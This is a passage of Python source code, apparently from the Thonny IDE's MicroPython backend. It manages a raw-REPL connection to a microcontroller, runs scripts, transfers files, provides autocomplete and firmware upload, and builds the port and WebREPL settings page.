self._discarded_bytes = self._connection.read_until(
[FIRST_RAW_PROMPT, RAW_PROMPT], time_left
)
def _get_welcome_text_in_raw_mode(self, timeout):
timer = TimeHelper(timeout)
# get welcome text with Ctrl+B
self._connection.write(b"\x02")
welcome_text = (
self._connection.read_until(NORMAL_PROMPT, timer.time_left)
.strip(b"\r\n >")
.decode("utf-8", "replace")
)
if os.name != "nt":
welcome_text = welcome_text.replace("\r\n", "\n")
# Go back to raw prompt
self._connection.write(b"\x01")
self._connection.read_until((FIRST_RAW_PROMPT, b"\x04>"), timer.time_left)
return welcome_text + " [backend=" + self.get_backend_name() + "]"
def _finalize_repl(self):
pass
def _soft_reboot_and_run_main(self):
if self._connection is None:
return
if not self.idle:
# TODO: ignore??
# self._connection.write(b"\r\x03")
self.interrupt()
get_runner()._set_state("running")
self.idle = False
# Need to go to normal mode. MP doesn't run user code in raw mode
# (CP does, but it doesn't hurt to do it there as well)
self._connection.write(b"\x02")
self._connection.read_until(NORMAL_PROMPT)
self._connection.write(b"\x04")
# Returning to the raw prompt will be handled by
# _read_next_serial_message
def _clear_environment(self):
assert self.idle
# TODO: Ctrl+D in raw repl is perfect for MicroPython
# but on CircuitPython it runs main.py
# TODO: which is better:
# self._execute_async(dedent("""
# for name in globals():
# if not name.startswith("__"):
# del globals()[name]
# """).strip())
# or
out, err = self._execute_and_get_response(
dedent(
"""
globals().clear()
__name__ == '__main__'
"""
).strip()
)
assert out == b""
assert err == b""
def _handle_serial_exception(self, e):
logging.exception("MicroPython serial error")
self._show_error_connect_again("\nLost connection to the device (%s)." % e)
self.idle = False
try:
self._connection.close()
except Exception:
logging.exception("Closing serial")
finally:
self._connection = None
def _execute_async(self, script):
"""Executes given MicroPython script on the device"""
assert self._connection.buffers_are_empty()
# print("----\n",script,"\n---")
command_bytes = script.encode("utf-8")
self._connection.write(command_bytes + b"\x04")
self.idle = False
# fetch confirmation
ok = self._connection.read(2)
assert ok == b"OK", "Expected OK, got %s, followed by %s" % (
ok,
self._connection.read_all(),
)
def _execute_and_get_response(self, script):
self._execute_async(script)
terminator = b"\x04>"
output = self._connection.read_until(terminator)[: -len(terminator)]
self.idle = True
return output.split(b"\x04")
def _execute_and_parse_value(self, script):
out, err = self._execute_and_get_response(script)
if err:
# display script on error
self._send_text_to_shell(script, "stderr")
# TODO: report the error to stderr
assert len(err) == 0, "Error was " + repr(err)
return ast.literal_eval(out.strip().decode("utf-8"))
def _execute_and_expect_empty_response(self, script):
out, err = self._execute_and_get_response(script)
if out or err:
# display script on error
self._send_text_to_shell(script, "stderr")
assert len(out) == 0, "Output was " + repr(out)
assert len(err) == 0, "Error was " + repr(err)
def _cmd_cd(self, cmd):
assert len(cmd.args) == 1
path = cmd.args[0]
if os.path.exists(path):
self._non_serial_msg_queue.put(ToplevelResponse(cwd=path))
else:
self._non_serial_msg_queue.put(
ToplevelResponse(error="Path doesn't exist: %s" % path)
)
def _cmd_Run(self, cmd):
self._clear_environment()
if not hasattr(cmd, "source"):
assert len(cmd.args) == 1
filename = cmd.args[0]
if os.path.isabs(filename):
full_filename = filename
else:
full_filename = os.path.join(get_workbench().get_cwd(), filename)
cmd.script_path = full_filename
with tokenize.open(full_filename) as fp:
source = fp.read()
else:
source = cmd.source
self._execute_async(source)
def _cmd_execute_source(self, cmd):
try:
# Try to parse as expression
ast.parse(cmd.source, mode="eval")
# If it didn't fail then source is an expression
msg_template = """{'message_class':'ToplevelResponse', 'value_info':(id(v), repr(v))}"""
self._execute_async(
"print('\\x04\\x02', [%s for v in [%s]][0])"
% (msg_template, cmd.source.strip())
)
except SyntaxError:
# source is a statement (or invalid syntax)
self._execute_async(cmd.source)
def _cmd_get_globals(self, cmd):
if not get_runner().is_waiting_toplevel_command():
return "postpone"
try:
if cmd.module_name == "__main__":
self._execute_async(
"print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name':'get_globals', 'module_name' : '__main__', 'globals':{x:repr(globals()[x]) for x in globals() if not x.startswith('__')}})"
)
else:
self._execute_async(
dedent(
"""
try:
import %(mod_name)s as __modForGlobs
print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name':'get_globals', 'module_name' : '%(mod_name)s', 'globals':{name : repr(getattr(__modForGlobs, name)) for name in dir(__modForGlobs) if not name.startswith('__')}})
del __modForGlobs
except Exception as e:
print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name':'get_globals', 'module_name' : '%(mod_name)s', 'globals':{}, 'error' : 'Error querying globals:\\n' + str(e)})
"""
% {"mod_name": cmd.module_name}
)
)
except Exception:
self._non_serial_msg_queue.put(
InlineResponse(
command_name="get_globals",
module_name=cmd.module_name,
globals={},
error="Error requesting globals:\\n" + traceback.format_exc(),
)
)
return None
def _cmd_get_dirs_child_data(self, cmd):
if not self._welcome_text:
return "postpone"
if "micro:bit" in self._welcome_text.lower():
return self._cmd_get_dirs_child_data_microbit(cmd)
else:
return self._cmd_get_dirs_child_data_generic(cmd)
def _cmd_get_dirs_child_data_microbit(self, cmd):
"""let it be here so micro:bit works with generic proxy as well"""
assert cmd["paths"] == {""}
try:
self._execute_async(
dedent(
"""
try:
import os as __temp_os
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name': 'get_dirs_child_data',
'node_id' : '%(node_id)s',
'dir_separator' : '',
'data': {'' : {name : __temp_os.size(name) for name in __temp_os.listdir()}}
})
del __temp_os
except Exception as e:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name':'get_dirs_child_data',
'node_id' : '%(node_id)s',
'dir_separator' : '',
'data':{},
'error' : 'Error getting file data: ' + str(e)
})
"""
% {"paths": cmd.paths, "node_id": cmd.node_id}
)
)
except Exception:
self._non_serial_msg_queue.put(
InlineResponse(
command_name="get_dirs_child_data",
error="Error requesting file data:\\n" + traceback.format_exc(),
)
)
return None
def _cmd_get_dirs_child_data_generic(self, cmd):
try:
self._execute_async(
dedent(
"""
try:
import os as __temp_os
# Init all vars, so that they can be deleted
# even if loop makes no iterations
__temp_result = {}
__temp_path = None
__temp_st = None
__temp_children = None
__temp_name = None
__temp_real_path = None
__temp_full = None
for __temp_path in %(paths)r:
__temp_real_path = __temp_path or '/'
__temp_children = {}
for __temp_name in __temp_os.listdir(__temp_real_path):
__temp_full = (__temp_real_path + '/' + __temp_name).replace("//", "/")
# print("processing", __temp_full)
__temp_st = __temp_os.stat(__temp_full)
if __temp_st[0] & 0o170000 == 0o040000:
# directory
__temp_children[__temp_name] = None
else:
__temp_children[__temp_name] = __temp_st[6]
__temp_result[__temp_path] = __temp_children
del __temp_os
del __temp_st
del __temp_children
del __temp_name
del __temp_path
del __temp_full
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name': 'get_dirs_child_data',
'node_id' : '%(node_id)s',
'dir_separator' : '/',
'data': __temp_result
})
del __temp_result
except Exception as e:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name':'get_dirs_child_data',
'dir_separator' : '/',
'node_id' : '%(node_id)s',
'data':{},
'error' : 'Error getting file data: ' + str(e)
})
"""
% {"paths": cmd.paths, "node_id": cmd.node_id}
)
)
except Exception:
self._non_serial_msg_queue.put(
InlineResponse(
command_name="get_dirs_child_data",
error="Error requesting file data:\\n" + traceback.format_exc(),
)
)
return None
def _cmd_editor_autocomplete(self, cmd):
# template for the response
msg = InlineResponse(
command_name="editor_autocomplete",
source=cmd.source,
row=cmd.row,
column=cmd.column,
error=None,
)
try:
script = jedi.Script(
cmd.source, cmd.row, cmd.column, sys_path=[self._get_api_stubs_path()]
)
completions = script.completions()
except Exception:
msg["error"] = "Autocomplete error"
self._non_serial_msg_queue.put(msg)
return
msg["completions"] = self.filter_completions(completions)
self._non_serial_msg_queue.put(msg)
def filter_completions(self, completions):
# filter out completions not applicable to MicroPython
result = []
for completion in completions:
if completion.name.startswith("__"):
continue
parent_name = completion.parent().name
name = completion.name
root = completion.full_name.split(".")[0]
# jedi proposes names from CPython builtins
if root in self._builtins_info and name not in self._builtins_info[root]:
continue
if parent_name == "builtins" and name not in self._builtins_info:
continue
result.append({"name": name, "complete": completion.complete})
return result
def _cmd_shell_autocomplete(self, cmd):
source = cmd.source
# TODO: combine dynamic results and jedi results
if source.strip().startswith("import ") or source.strip().startswith("from "):
# this needs the power of jedi
msg = InlineResponse(
command_name="shell_autocomplete", source=cmd.source, error=None
)
try:
# at the moment I'm assuming source is the code before cursor, not whole input
lines = source.split("\n")
script = jedi.Script(
source,
len(lines),
len(lines[-1]),
sys_path=[self._get_api_stubs_path()],
)
completions = script.completions()
msg["completions"] = self.filter_completions(completions)
except Exception:
msg["error"] = "Autocomplete error"
self._non_serial_msg_queue.put(msg)
else:
# use live data
regex = re.search(
r"(\w+\.)*(\w+)?$", source
) # https://github.com/takluyver/ubit_kernel/blob/master/ubit_kernel/kernel.py
if regex:
n = regex.group()
# the response format is not the same as expected by the gui
# but it will be transformed later
if "." in n:
obj, n = n.rsplit(".", 1)
self._execute_async(
"print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name': 'shell_autocomplete', 'match':"
+ repr(n)
+ ", 'source':"
+ repr(source)
+ ", 'names':dir("
+ obj
+ ")})"
)
else:
self._execute_async(
"print('\\x04\\x02', {'message_class' : 'InlineResponse', 'command_name': 'shell_autocomplete', 'match':"
+ repr(n)
+ ", 'source':"
+ repr(source)
+ ", 'names':dir()})"
)
def _cmd_dump_api_info(self, cmd):
"For use during development of the plug-in"
try:
self._execute_and_expect_empty_response(
dedent(
"""
def __print_object_atts(obj):
import gc
result = []
errors = []
for name in dir(obj):
try:
val = getattr(obj, name)
result.append((name, repr(val), repr(type(val))))
except BaseException as e:
errors.append("Couldn't get attr '%s' from object '%r', Err: %r" % (name, obj, e))
print((result, errors))
gc.collect()
"""
)
)
for module_name in sorted(self._fetch_builtin_modules()):
if (
not module_name.startswith("_")
# and not module_name.startswith("ada")
# and not module_name == "builtins"
):
# self._send_text_to_shell("Dumping " + module_name + "\n", "stdout")
file_name = os.path.join(
self._get_api_stubs_path(),
module_name.replace(".", "/") + ".py",
)
self._dump_module_stubs(module_name, file_name)
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
def _dump_module_stubs(self, module_name, file_name):
_, err = self._execute_and_get_response("import {0}".format(module_name))
if err:
print("FAILED IMPORTING MODULE:", module_name, "\nErr: " + repr(err))
return
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with io.open(file_name, "w", encoding="utf-8", newline="\n") as fp:
if module_name not in [
"webrepl",
"_webrepl",
"gc",
"http_client",
"http_client_ssl",
"http_server",
"framebuf",
"example_pub_button",
"flashbdev",
]:
self._dump_object_stubs(fp, module_name, "")
_, err = self._execute_and_get_response("del {0}".format(module_name))
def _dump_object_stubs(self, fp, object_expr, indent):
if object_expr in [
"docs.conf",
"pulseio.PWMOut",
"adafruit_hid",
"upysh",
# "webrepl",
# "gc",
# "http_client",
# "http_server",
]:
print("SKIPPING problematic name:", object_expr)
return
print("DUMPING", indent, object_expr)
items, errors = self._execute_and_parse_value(
"__print_object_atts({0})".format(object_expr)
)
if errors:
print("ERRORS", errors)
for name, rep, typ in sorted(items, key=lambda x: x[0]):
if name.startswith("__"):
continue
print("DUMPING", indent, object_expr, name)
self._send_text_to_shell(" * " + name + " : " + typ, "stdout")
if typ in ["<class 'function'>", "<class 'bound_method'>"]:
fp.write(indent + "def " + name + "():\n")
fp.write(indent + " pass\n\n")
elif typ in ["<class 'str'>", "<class 'int'>", "<class 'float'>"]:
fp.write(indent + name + " = " + rep + "\n")
elif typ == "<class 'type'>" and indent == "":
# full expansion only on toplevel
fp.write("\n")
fp.write(indent + "class " + name + ":\n") # What about superclass?
fp.write(indent + " ''\n")
self._dump_object_stubs(
fp, "{0}.{1}".format(object_expr, name), indent + " "
)
else:
# keep only the name
fp.write(indent + name + " = None\n")
def _cmd_cat(self, cmd):
if len(cmd.args) != 1:
self._send_error_to_shell("Command requires one argument")
return
source = cmd.args[0]
mount = self._get_fs_mount()
if mount is None:
self._cat_via_serial(source)
else:
source = os.path.join(mount, source.strip("/"))
self._cat_via_mount(source)
def _cmd_lsdevice(self, cmd):
try:
items = self._list_files()
out = "\n".join(items) + "\n"
self._send_text_to_shell(out, "stdout")
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
def _cmd_upload(self, cmd):
# Target is interpreted relative to the root
if len(cmd.args) == 1:
source = cmd.args[0]
# target is at root
target = os.path.basename(source)
elif len(cmd.args) == 2:
source = cmd.args[0]
target = cmd.args[1]
else:
# TODO: test this case
raise RuntimeError("Command requires 1 or 2 arguments")
if not os.path.isabs(source):
source = os.path.join(get_workbench().get_cwd(), source)
if not os.path.isfile(source):
raise IOError("No such file: %s" % source)
target = target.replace("\\", "/")
# Only prepend slash if it is known that device supports directories
# (it's probably safe to omit slash anyway)
if self._supports_directories() and not target.startswith("/"):
target = "/" + target
try:
self._check_and_upload(source, target)
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
# TODO: Output confirmation ? (together with file size)
# Or should the confirmation be given in terms of mount path?
def _cmd_write_file(self, cmd):
BUFFER_SIZE = 32
data = cmd["content_bytes"]
self._execute_and_expect_empty_response(
dedent(
"""
__temp_path = '{path}'
__temp_f = open(__temp_path, 'wb')
__temp_written = 0
"""
).format(path=cmd["path"])
)
size = len(data)
for i in range(0, size, BUFFER_SIZE):
chunk_size = min(BUFFER_SIZE, size - i)
chunk = data[i : i + chunk_size]
self._execute_and_expect_empty_response(
"__temp_written += __temp_f.write({chunk!r})".format(chunk=chunk)
)
self._execute_async(
dedent(
"""
try:
__temp_f.close()
del __temp_f
if __temp_written != <<size>>:
raise RuntimeError("Wrote %d bytes out of %d" % (__temp_written, <<size>>))
del __temp_written
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name': 'write_file',
'path' : __temp_path
})
except Exception as e:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name':'write_file',
'path' : __temp_path,
'error' : 'Error saving file content: ' + str(e)
})
del __temp_path
"""
).replace("<<size>>", str(size))
)
def _cmd_read_file(self, cmd):
print("READING", cmd)
try:
self._execute_async(
dedent(
"""
try:
__temp_path = '%(path)s'
with open(__temp_path, 'rb') as __temp_fp:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name': 'read_file',
'path' : __temp_path,
'content_bytes': __temp_fp.read()
})
del __temp_fp
del __temp_path
except Exception as e:
print('\\x04\\x02', {
'message_class' : 'InlineResponse',
'command_name':'read_file',
'path' : __temp_path,
'content_bytes': b'',
'error' : 'Error getting file content: ' + str(e)
})
"""
)
% cmd
)
except Exception:
self._non_serial_msg_queue.put(
InlineResponse(
command_name="read_file",
path=cmd.path,
content_bytes=b"",
error="Error requesting file content:\\n" + traceback.format_exc(),
)
)
def _check_and_upload(self, source, target):
# if target is a py file,
# then give warning if source has syntax errors
# Note that it's incomplete solution --
# if current Python version is later than 3.5, then it may
# accept source which gives syntax errors on MP.
if target.endswith(".py"):
with tokenize.open(source) as fp:
src = fp.read()
try:
ast.parse(src, source)
except SyntaxError as e:
self._send_error_to_shell(
"%s has syntax errors:\n%s\n\nFile will not be uploaded."
% (source, e)
)
return
try:
self._upload(source, target)
except Exception:
self._send_error_to_shell(traceback.format_exc())
def _upload(self, source, target):
mount = self._get_fs_mount()
if mount is None:
self._upload_via_serial(source, target)
else:
virtual_path = os.path.join(mount, target.strip("/"))
self._upload_via_mount(source, virtual_path)
def _upload_via_serial(self, source, target):
assert self.idle
with open(source, "rb") as local:
content = local.read()
self._execute_and_expect_empty_response("__upf = open(%r, 'wb')" % target)
BLOCK_SIZE = 64
for i in range(0, len(content), BLOCK_SIZE):
self._execute_and_expect_empty_response(
"__upf.write(%r)" % content[i : i + BLOCK_SIZE]
)
self._execute_and_expect_empty_response("__upf.close()")
self._execute_and_expect_empty_response("del __upf")
def _upload_via_mount(self, source, target):
with open(source, "rb") as fp:
content = fp.read()
try:
with open(target, "wb") as fp:
fp.write(content)
# Force writes to the device to avoid data corruption
# when user resets or plugs out the device
os.fsync(fp)
except OSError as e:
self._report_upload_via_mount_error(source, target, e)
return
def _report_upload_via_mount_error(self, source, target, error):
self._send_error_to_shell(
"Couldn't write to %s\nOriginal error: %s\n\nIf the target directory exists then it may be corrupted."
% (target, error)
)
def _cat_via_serial(self, source):
try:
out, err = self._execute_and_get_response(
dedent(
"""
with open(%r, "r") as fp:
print(fp.read())
"""
% source
).strip()
)
if out:
self._send_text_to_shell(
out.decode("utf-8", errors="replace"), "stdout"
)
if err:
self._send_text_to_shell(
err.decode("utf-8", errors="replace"), "stderr"
)
except Exception:
self._send_error_to_shell(traceback.format_exc())
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
def _cat_via_mount(self, source):
try:
with open(source, "r", encoding="UTF-8", errors="replace") as fp:
self._send_text_to_shell(fp.read(), "stdout")
except Exception:
self._send_error_to_shell(traceback.format_exc())
finally:
self._non_serial_msg_queue.put(ToplevelResponse())
def _list_files(self):
mount = self._get_fs_mount()
if mount is None:
return self._execute_and_parse_value(
"import os as __os_; print(__os_.listdir()); del __os_"
)
else:
return os.listdir(mount)
def _supports_directories(self):
if "micro:bit" in self._welcome_text.lower():
return False
else:
return True
def _get_fs_mount_name(self):
return None
def _get_bootloader_mount_name(self):
return None
def _get_fs_mount(self):
if self._get_fs_mount_name() is None:
return None
else:
candidates = find_volumes_by_name(self._get_fs_mount_name())
if len(candidates) == 0:
raise RuntimeError("Could not find volume " + self._get_fs_mount_name())
elif len(candidates) > 1:
raise RuntimeError(
"Found several possible mount points: %s" % candidates
)
else:
return candidates[0]
def _read_next_serial_message(self) -> Optional[MessageFromBackend]:
new_bytes = self._connection.read_all()
if len(new_bytes) == 0:
return None
# TODO: Handle the case where part of the prompt was already published in previous message
# Look for the first marker (EOT anywhere or NORMAL_PROMPT in the end of the seq)
match = re.search(
b"("
+ EOT
+ b"|"
+ NORMAL_PROMPT
+ b"$" # Consider prompts only if they're at the end of output
+ b"|"
+ FIRST_RAW_PROMPT
+ b"$"
+ b")",
new_bytes,
)
if match is None:
# normal output (possibly partial)
return self._read_output_message(new_bytes, False)
elif match.start() > 0:
# starts with block of normal output
self._connection.unread(new_bytes[match.start() :])
return self._read_output_message(new_bytes[: match.start()], True)
elif match.group() == FIRST_RAW_PROMPT:
assert new_bytes == FIRST_RAW_PROMPT
self.idle = True
return ToplevelResponse()
elif match.group() == NORMAL_PROMPT:
# Go to raw prompt
assert new_bytes == NORMAL_PROMPT, "Got %s" % new_bytes
return self._enter_raw_repl(True)
else:
assert match.group() == EOT
assert match.start() == 0
if len(new_bytes) == 1:
# can't decide anything yet
self._connection.unread(new_bytes)
return None
elif new_bytes[1:2] == RAW_PROMPT:
# must be end of the response to a non-Thonny command
# Only treat as raw prompt if it ends the output
if new_bytes[1:] == RAW_PROMPT:
assert (
self._connection.incoming_is_empty()
) # TODO: what about Ctlr-? ?
self.idle = True
return ToplevelResponse()
else:
# Looks like the prompt was discarded by a soft reboot (or some other reason?)
# hide it and forget it
self._connection.unread(new_bytes[2:])
return None
elif new_bytes[1:2] == THONNY_MSG_START:
# must be followed by empty error block and raw prompt
# read the message, following exception block and next prompt
terminator = b"\r\n" + EOT + EOT + RAW_PROMPT
term_loc = new_bytes.find(terminator)
if term_loc == -1:
# not complete yet
self._connection.unread(new_bytes)
return None
elif term_loc == len(new_bytes) - len(terminator):
# This terminator ends the bytes
# The normal, completed case
assert self._connection.incoming_is_empty()
msg_bytes = new_bytes[2 : -len(terminator)]
self.idle = True
return self._parse_message(msg_bytes)
else:
# There is something following the terminator
# I guess this can be caused by interrupt
# This means the message is stale
logging.info(
"disregarding out of date Thonny message: %r", new_bytes
)
# Unread following stuff
self._connection.unread(new_bytes[term_loc + len(terminator) :])
else:
# exception block
# this is followed by EOT and can/should be read in one piece
next_eot_loc = new_bytes.find(EOT, 1)
if next_eot_loc == -1:
# the block isn't complete yet
self._connection.unread(new_bytes)
return None
else:
# block is complete
block_bytes = new_bytes[1:next_eot_loc]
leftover_bytes = new_bytes[next_eot_loc:] # should be EOT + >
self._connection.unread(leftover_bytes)
if len(block_bytes) > 0:
# non-empty exception block
return BackendEvent(
event_type="ProgramOutput",
stream_name="stderr",
data=self.transform_output(
block_bytes.decode("utf-8", "replace"), "stderr"
),
)
else:
return None
return None
def _parse_message(self, msg_bytes):
try:
msg_str = msg_bytes.decode("utf-8").strip()
except:
traceback.print_exc()
msg_str = msg_bytes.decode("utf-8", "replace").strip()
try:
msg = ast.literal_eval(msg_str)
except:
logging.getLogger("thonny").error("Could not eval %r", msg_str)
raise
assert isinstance(msg, dict)
class_name = msg["message_class"]
del msg["message_class"]
assert class_name in globals()
class_ = globals()[class_name]
return class_(**msg)
def _read_output_message(self, out_bytes, complete) -> Optional[BackendEvent]:
if complete:
out_str = out_bytes.decode("utf-8", "replace")
else:
# out_bytes may end with a partial utf-8 char
while True:
try:
out_str = out_bytes.decode("utf-8", "replace")
break
except UnicodeDecodeError:
# unread last byte and try again
self._connection.unread(out_bytes[-1:])
out_bytes = out_bytes[:-1]
if len(out_str) == 0:
return None
else:
transformed = self.transform_output(out_str, "stdout")
return BackendEvent(
event_type="ProgramOutput", stream_name="stdout", data=transformed
)
def transform_output(self, s, stream_name):
if os.name != "nt":
#
s = s.replace("\r\n", "\n")
# replace "<stdin>" in error messages with script name
if (
stream_name == "stderr"
and self._last_toplevel_command
and self._last_toplevel_command.name in ["Run", "run"]
and hasattr(self._last_toplevel_command, "script_path")
):
s = s.replace('"<stdin>"', '"%s"' % self._last_toplevel_command.script_path)
# TODO: get rid of raw prompts (may occur after soft reboot)
# TOOD: move it to CircuitPython subclass
return s.replace(
"Press any key to enter the REPL. Use CTRL-D to reload.",
"Press CTRL-C to enter the REPL. Use CTRL-D to reload.",
)
def _get_path_prefix(self):
if not self._supports_directories():
return ""
elif "LoBo" in self._welcome_text or "WiPy with ESP32" in self._welcome_text:
return "/flash/"
else:
return "/"
def get_default_directory(self):
prefix = self._get_path_prefix()
if prefix.endswith("/") and prefix != "/":
return prefix[:-1]
else:
return prefix
def _get_main_script_path(self):
return self._get_path_prefix() + "main.py"
def _get_boot_script_path(self):
return self._get_path_prefix() + "boot.py"
def _get_script_path(self):
local_path = (
get_workbench().get_editor_notebook().get_current_editor().save_file(False)
)
assert os.path.isfile(local_path), "File not found: %s" % local_path
return self._get_path_prefix() + os.path.basename(local_path)
def transform_message(self, msg):
if msg is None:
return None
if isinstance(msg.get("value_info", None), tuple):
msg["value_info"] = common.ValueInfo(*msg["value_info"])
if (
getattr(msg, "command_name", None) == "shell_autocomplete"
and "completions" not in msg
):
names = msg["names"]
match = msg["match"]
del msg["names"]
matches = [
{"name": n, "complete": n[len(match) :]}
for n in names
if n.startswith(match) and not n.startswith("__")
]
msg["completions"] = matches
return msg
else:
return msg
def _enter_raw_repl(self, strict):
if strict:
assert self._connection.buffers_are_empty()
discarded_data = b""
for delay in [0.01, 0.05, 0.1, 0.5]:
self._connection.write(b"\x03")
sleep(delay / 3)
self._connection.write(b"\x01")
sleep(delay)
# Consume the raw repl introduction + prompt
discarded_data += self._connection.read_all()
if discarded_data.endswith(b"\r\n>"):
self.idle = True
return ToplevelResponse()
self._send_error_to_shell(
"Couldn't connect to the raw REPL. Serial output: " + str(discarded_data)
)
self.idle = False
return None
def _send_error_to_shell(self, message_text):
self._send_text_to_shell(message_text, "stderr")
def _send_text_to_shell(self, message_text, stream_name):
if not message_text.endswith("\n"):
message_text += "\n"
self._non_serial_msg_queue.put(
BackendEvent(
event_type="ProgramOutput", stream_name=stream_name, data=message_text
)
)
def _get_builtins_info(self):
"""
for p in self._get_api_stubs_path():
builtins_file = os.path.join(p, "__builtins__.py")
if os.path.exists(builtins_file):
return parse_api_information(builtins_file)
"""
path = os.path.join(self._get_api_stubs_path(), "builtins.py")
if os.path.exists(path):
return parse_api_information(path)
else:
return {}
def _get_api_stubs_path(self):
import inspect
return os.path.join(
os.path.dirname(inspect.getfile(self.__class__)), "api_stubs"
)
@property
def firmware_filetypes(self):
return [("all files", ".*")]
@property
def micropython_upload_enabled(self):
return self._connection is not None
def select_and_upload_micropython(self):
firmware_path = askopenfilename(
filetypes=self.firmware_filetypes,
initialdir=get_workbench().get_option("run.working_directory"),
)
if firmware_path:
self.upload_micropython(firmware_path)
def upload_micropython(self, firmware_path):
cmd = self.construct_firmware_upload_command(firmware_path)
self.disconnect()
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
dlg = SubprocessDialog(
get_workbench(),
proc,
"Uploading firmware",
autoclose=False,
conclusion="Done.\nNB! If opening REPL fails on first trial\nthen wait a second and try again.",
)
show_dialog(dlg)
def construct_firmware_upload_command(self, firmware_path):
raise NotImplementedError()
@property
def known_usb_vids_pids(self):
"""Return set of pairs of USB device VID, PID"""
return set()
@property
def known_port_descriptions(self):
return set()
def get_node_label(self):
if "CircuitPython" in self._welcome_text:
return "CircuitPython device"
elif "micro:bit" in self._welcome_text.lower():
return "micro:bit"
else:
return "MicroPython device"
def has_separate_files(self):
return self._connection is not None
def can_do_file_operations(self):
return self.idle
class MicroPythonConfigPage(BackendDetailsConfigPage):
backend_name = None # Will be overwritten on Workbench.add_backend
def __init__(self, master):
super().__init__(master)
intro_text = (
"Connect your device to the computer and select corresponding port below (look for your device name, \n"
+ '"USB Serial" or "UART"). If you can\'t find it, you may need to install proper USB driver first.'
)
if self.allow_webrepl:
intro_text = (
"Connecting via USB cable:\n"
+ intro_text
+ "\n\n"
+ "Connecting via WebREPL protocol:\n"
+ "If your device supports WebREPL, first connect via serial, make sure WebREPL is enabled\n"
+ "(import webrepl_setup), connect your computer and device to same network and select < WebREPL > below"
)
intro_label = ttk.Label(self, text=intro_text)
intro_label.grid(row=0, column=0, sticky="nw")
driver_url = self._get_usb_driver_url()
if driver_url:
driver_url_label = create_url_label(self, driver_url)
driver_url_label.grid(row=1, column=0, sticky="nw")
port_label = ttk.Label(
self, text="Port or WebREPL" if self.allow_webrepl else "Port"
)
port_label.grid(row=3, column=0, sticky="nw", pady=(10, 0))
self._ports_by_desc = {
p.description
if p.device in p.description
else p.description + " (" + p.device + ")": p.device
for p in list_serial_ports()
}
self._ports_by_desc["< Try to detect port automatically >"] = "auto"
self._ports_by_desc["< None / don't connect at all >"] = None
self._WEBREPL_OPTION_DESC = "< WebREPL >"
if self.allow_webrepl:
self._ports_by_desc[self._WEBREPL_OPTION_DESC] = "webrepl"
def port_order(p):
_, name = p
if name is None:
return ""
elif name.startswith("COM") and len(name) == 4:
# Make one-digit COM ports go before COM10
return name.replace("COM", "COM0")
else:
return name
# order by port, auto first
port_descriptions = [
key for key, _ in sorted(self._ports_by_desc.items(), key=port_order)
]
self._port_desc_variable = create_string_var(
self.get_current_port_desc(), self._on_change_port
)
self._port_combo = ttk.Combobox(
self,
exportselection=False,
textvariable=self._port_desc_variable,
values=port_descriptions,
)
self._port_combo.state(["!disabled", "readonly"])
self._port_combo.grid(row=4, column=0, sticky="new")
self.columnconfigure(0, weight=1)
if self.allow_webrepl:
self._init_webrepl_frame()
self._on_change_port()
def _init_webrepl_frame(self):
self._webrepl_frame = ttk.Frame(self)
self._webrepl_url_var = create_string_var(DEFAULT_WEBREPL_URL)
url_label = ttk.Label(
self._webrepl_frame, text="URL (eg. %s)" % DEFAULT_WEBREPL_URL
)
url_label.grid(row=0, column=0, sticky="nw", pady=(10, 0))
url_entry = ttk.Entry(
self._webrepl_frame, textvariable=self._webrepl_url_var, width=24
)
url_entry.grid(row=1, column=0, sticky="nw")
self._webrepl_password_var = create_string_var(
get_workbench().get_option(self.backend_name + ".webrepl_password")
)
pw_label = ttk.Label(
self._webrepl_frame,
text="Password (the one specified with `import webrepl_setup`)",
)
pw_label.grid(row=2, column=0, sticky="nw", pady=(10, 0))
pw_entry = ttk.Entry(
self._webrepl_frame, textvariable=self._webrepl_password_var, width=9
)
pw_entry.grid(row=3, column=0, sticky="nw")
def get_current_port_desc(self):
name = get_workbench().get_option(self.backend_name + ".port")
for desc in self._ports_by_desc:
if self._ports_by_desc[desc] == name:
return desc
return ""
def is_modified(self):
return (
self._port_desc_variable.modified # pylint: disable=no-member
or self.allow_webrepl
and self._webrepl_password_var.modified # pylint: disable=no-member
or self.allow_webrepl
and self._webrepl_url_var.modified
) # pylint: disable=no-member
def should_restart(self):
return self.is_modified()
def apply(self):
if not self.is_modified():
return
else:
port_desc = self._port_desc_variable.get()
port_name = self._ports_by_desc[port_desc]
get_workbench().set_option(self.backend_name + ".port", port_name)
get_workbench().set_option(
self.backend_name + ".webrepl_url", self._webrepl_url_var.get()
)
get_workbench().set_option(
self.backend_name + ".webrepl_password",
self._webrepl_password_var.get(),
)
def _on_change_port(self, *args):
if self._port_desc_variable.get() == self._WEBREPL_OPTION_DESC:
self._webrepl_frame.grid(row=6, column=0, sticky="nwe")
elif self.allow_webrepl and self._webrepl_frame.winfo_ismapped():
self._webrepl_frame.grid_forget()
def _get_usb_driver_url(self):
return None
@property
def allow_webrepl(self):
return False
class GenericMicroPythonProxy(MicroPythonProxy):
@property
def known_usb_vids_pids(self):
"""Return set of pairs of USB device (VID, PID)"""
return {
# Generic MicroPython Board, see http://pid.codes/org/MicroPython/
(0x1209, 0xADDA)
}
class GenericMicroPythonConfigPage(MicroPythonConfigPage):
@property
def allow_webrepl(self):
return True
class Connection:
"""Utility class for using Serial or WebSocket connection
Uses background thread to read from the source as soon as possible
to avoid loss of data (because buffer overflow or the device discarding
unread data).
Allows writing with delays after each n bytes.
Allows unreading data.
"""
def __init__(self):
self._read_queue = Queue() # populated by reader thread
self._read_buffer = bytearray() # used for unreading and postponing bytes
self.num_bytes_received = 0
